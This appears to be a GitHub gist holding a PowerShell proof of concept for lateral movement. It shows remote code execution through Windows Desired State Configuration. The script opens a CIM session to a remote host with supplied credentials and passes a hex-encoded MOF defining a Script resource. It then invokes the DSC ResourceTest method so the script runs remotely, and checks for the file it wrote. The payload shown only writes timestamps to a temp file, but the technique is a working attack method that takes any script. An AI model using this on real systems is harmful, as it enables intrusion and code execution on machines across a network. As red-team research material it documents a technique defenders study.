Forked from mattifestation/PowerShellDSCLateralMovement.ps1
Created
June 29, 2018 09:23
-
-
Save 0x09AL/0015ac0e5d0d6de97247b3f969b4ad7b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This idea originated from this blog post on Invoke DSC Resources directly: | |
| # https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
| <# | |
| $MOFContents = @' | |
| instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
| { | |
| ResourceID = "[Script]ScriptExample"; | |
| GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
| TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
| SetScript = "\"$(Get-Date): I am being SET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
| SourceInfo = "::3::5::Script"; | |
| ModuleName = "PsDesiredStateConfiguration"; | |
| ModuleVersion = "1.0"; | |
| ConfigurationName = "ScriptTest"; | |
| }; | |
| instance of OMI_ConfigurationDocument | |
| { | |
| Version="2.0.0"; | |
| MinimumCompatibleVersion = "1.0.0"; | |
| CompatibleVersionAdditionalProperties= {"Omi_BaseResource:ConfigurationName"}; | |
| Author="TestUser"; | |
| GenerationDate="02/26/2018 07:09:21"; | |
| GenerationHost="TestHost"; | |
| Name="ScriptTest"; | |
| }; | |
| '@ | |
| $NormalizedMOFContents = [Text.Encoding]::UTF8.GetString([Text.Encoding]::ASCII.GetBytes($MOFContents)) | |
| $TotalSize = [BitConverter]::GetBytes($NormalizedMOFContents.Length + 4) | |
| [Byte[]] $MOFBytes = $TotalSize + [Text.Encoding]::UTF8.GetBytes($NormalizedMOFContents) | |
| # Output the MOF string as an embedded byte array as seen below | |
| "[Byte[]] `$MOFBytes = @($(($MOFBytes | % { '0x{0:X2}' -f $_ }) -join ','))" | |
| #> | |
| $ComputerName = '192.168.1.75' | |
| $User = 'WorkUser' | |
| $CimSession = New-CimSession -ComputerName $ComputerName -Credential $User | |
| [Byte[]] $MOFBytes = @(0x98,0x03,0x00,0x00,0x69,0x6E,0x73,0x74,0x61,0x6E,0x63,0x65,0x20,0x6F,0x66,0x20,0x4D,0x53,0x46,0x54,0x5F,0x53,0x63,0x72,0x69,0x70,0x74,0x52,0x65,0x73,0x6F,0x75,0x72,0x63,0x65,0x20,0x61,0x73,0x20,0x24,0x4D,0x53,0x46,0x54,0x5F,0x53,0x63,0x72,0x69,0x70,0x74,0x52,0x65,0x73,0x6F,0x75,0x72,0x63,0x65,0x31,0x72,0x65,0x66,0x0A,0x7B,0x0A,0x20,0x20,0x20,0x20,0x52,0x65,0x73,0x6F,0x75,0x72,0x63,0x65,0x49,0x44,0x20,0x3D,0x20,0x22,0x5B,0x53,0x63,0x72,0x69,0x70,0x74,0x5D,0x53,0x63,0x72,0x69,0x70,0x74,0x45,0x78,0x61,0x6D,0x70,0x6C,0x65,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x47,0x65,0x74,0x53,0x63,0x72,0x69,0x70,0x74,0x20,0x3D,0x20,0x22,0x5C,0x22,0x24,0x28,0x47,0x65,0x74,0x2D,0x44,0x61,0x74,0x65,0x29,0x3A,0x20,0x49,0x20,0x61,0x6D,0x20,0x62,0x65,0x69,0x6E,0x67,0x20,0x47,0x45,0x54,0x5C,0x22,0x20,0x7C,0x20,0x4F,0x75,0x74,0x2D,0x46,0x69,0x6C,0x65,0x20,0x43,0x3A,0x5C,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x5C,0x54,0x65,0x6D,0x70,0x5C,0x5C,0x53,0x63,0x72,0x69,0x70,0x74,0x52,0x75,0x6E,0x2E,0x74,0x78,0x74,0x20,0x2D,0x41,0x70,0x70,0x65,0x6E,0x64,0x3B,0x20,0x72,0x65,0x74,0x75,0x72,0x6E,0x20,0x24,0x54,0x72,0x75,0x65,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x54,0x65,0x73,0x74,0x53,0x63,0x72,0x69,0x70,0x74,0x20,0x3D,0x20,0x22,0x5C,0x22,0x24,0x28,0x47,0x65,0x74,0x2D,0x44,0x61,0x74,0x65,0x29,0x3A,0x20,0x49,0x20,0x61,0x6D,0x20,0x62,0x65,0x69,0x6E,0x67,0x20,0x54,0x45,0x53,0x54,0x45,0x44,0x5C,0x22,0x20,0x7C,0x20,0x4F,0x75,0x74,0x2D,0x46,0x69,0x6C,0x65,0x20,0x43,0x3A,0x5C,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x5C,0x54,0x65,0x6D,0x70,0x5C,0x5C,0x53,0x63,0x72,0x69,0x70,0x74,0x52,0x75,0x6E,0x2E,0x74,0x78,0x74,0x20,0x2D,0x41,0x70,0x70,0x65,0x6E,0x64,0x3B,0x20,0x72,0x65,0x74,0x75,0x72,0x6E,0x20,0x24,0x54,0x72,0x75,0x65,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x53,0x65,0x74,0x53,0x63,0x72,0x69,0x70,0x74,0x20,0x3D,0x20,0x22,0x5C,0x22,0x24,0x28,0x47,0x65,0x74,0x2D,0x44,0x61,0x74,0x65,0x29,0x3A,0x20,0x49,0x20,0x61,0x6D,0x20,0x62,0x65,0x69,0x6E,0x67,0x20,0x53,0x45,0x54,0x5C,0x22,0x20,0x7C,0x20,0x4F,0x75,0x74,0x2D,0x46,0x69,0x6C,0x65,0x20,0x43,0x3A,0x5C,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x5C,0x54,0x65,0x6D,0x70,0x5C,0x5C,0x53,0x63,0x72,0x69,0x70,0x74,0x52,0x75,0x6E,0x2E,0x74,0x78,0x74,0x20,0x2D,0x41,0x70,0x70,0x65,0x6E,0x64,0x3B,0x20,0x72,0x65,0x74,0x75,0x72,0x6E,0x20,0x24,0x54,0x72,0x75,0x65,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x53,0x6F,0x75,0x72,0x63,0x65,0x49,0x6E,0x66,0x6F,0x20,0x3D,0x20,0x22,0x3A,0x3A,0x33,0x3A,0x3A,0x35,0x3A,0x3A,0x53,0x63,0x72,0x69,0x70,0x74,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x4E,0x61,0x6D,0x65,0x20,0x3D,0x20,0x22,0x50,0x73,0x44,0x65,0x73,0x69,0x72,0x65,0x64,0x53,0x74,0x61,0x74,0x65,0x43,0x6F,0x6E,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6F,0x6E,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x3D,0x20,0x22,0x31,0x2E,0x30,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x43,0x6F,0x6E,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6F,0x6E,0x4E,0x61,0x6D,0x65,0x20,0x3D,0x20,0x22,0x53,0x63,0x72,0x69,0x70,0x74,0x54,0x65,0x73,0x74,0x22,0x3B,0x0A,0x7D,0x3B,0x0A,0x0A,0x69,0x6E,0x73,0x74,0x61,0x6E,0x63,0x65,0x20,0x6F,0x66,0x20,0x4F,0x4D,0x49,0x5F,0x43,0x6F,0x6E,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6F,0x6E,0x44,0x6F,0x63,0x75,0x6D,0x65,0x6E,0x74,0x0A,0x7B,0x0A,0x20,0x20,0x20,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x22,0x32,0x2E,0x30,0x2E,0x30,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x4D,0x69,0x6E,0x69,0x6D,0x75,0x6D,0x43,0x6F,0x6D,0x70,0x61,0x74,0x69,0x62,0x6C,0x65,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x3D,0x20,0x22,0x31,0x2E,0x30,0x2E,0x30,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x43,0x6F,0x6D,0x70,0x61,0x74,0x69,0x62,0x6C,0x65,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x41,0x64,0x64,0x69,0x74,0x69,0x6F,0x6E,0x61,0x6C,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x69,0x65,0x73,0x3D,0x20,0x7B,0x22,0x4F,0x6D,0x69,0x5F,0x42,0x61,0x73,0x65,0x52,0x65,0x73,0x6F,0x75,0x72,0x63,0x65,0x3A,0x43,0x6F,0x6E,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6F,0x6E,0x4E,0x61,0x6D,0x65,0x22,0x7D,0x3B,0x0A,0x20,0x20,0x20,0x20,0x41,0x75,0x74,0x68,0x6F,0x72,0x3D,0x22,0x54,0x65,0x73,0x74,0x55,0x73,0x65,0x72,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x47,0x65,0x6E,0x65,0x72,0x61,0x74,0x69,0x6F,0x6E,0x44,0x61,0x74,0x65,0x3D,0x22,0x30,0x32,0x2F,0x32,0x36,0x2F,0x32,0x30,0x31,0x38,0x20,0x30,0x37,0x3A,0x30,0x39,0x3A,0x32,0x31,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x47,0x65,0x6E,0x65,0x72,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x73,0x74,0x3D,0x22,0x54,0x65,0x73,0x74,0x48,0x6F,0x73,0x74,0x22,0x3B,0x0A,0x20,0x20,0x20,0x20,0x4E,0x61,0x6D,0x65,0x3D,0x22,0x53,0x63,0x72,0x69,0x70,0x74,0x54,0x65,0x73,0x74,0x22,0x3B,0x0A,0x7D,0x3B) | |
| $MethodArgs = @{ | |
| ModuleName = 'PSDesiredStateConfiguration' | |
| ResourceType = 'MSFT_ScriptResource' | |
| resourceProperty = $MOFBytes | |
| } | |
| $Arguments = @{ | |
| Namespace = 'root/Microsoft/Windows/DesiredStateConfiguration' | |
| ClassName = 'MSFT_DSCLocalConfigurationManager' | |
| MethodName = 'ResourceTest' | |
| Arguments = $MethodArgs | |
| CimSession = $CimSession | |
| } | |
| # Invoke the DSC script resource Test method | |
| Invoke-CimMethod @Arguments | |
| # Assuming Invoke-CimMethod doesn't fail, C:\Windows\Temp\ScriptRun.txt should have been written to disk on the remote system. | |
| Get-CimInstance -ClassName 'CIM_DataFile' -Filter 'Drive = "C:" AND Path = "\\Windows\\Temp\\" AND FileName = "ScriptRun" AND Extension = "txt"' -CimSession $CimSession |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment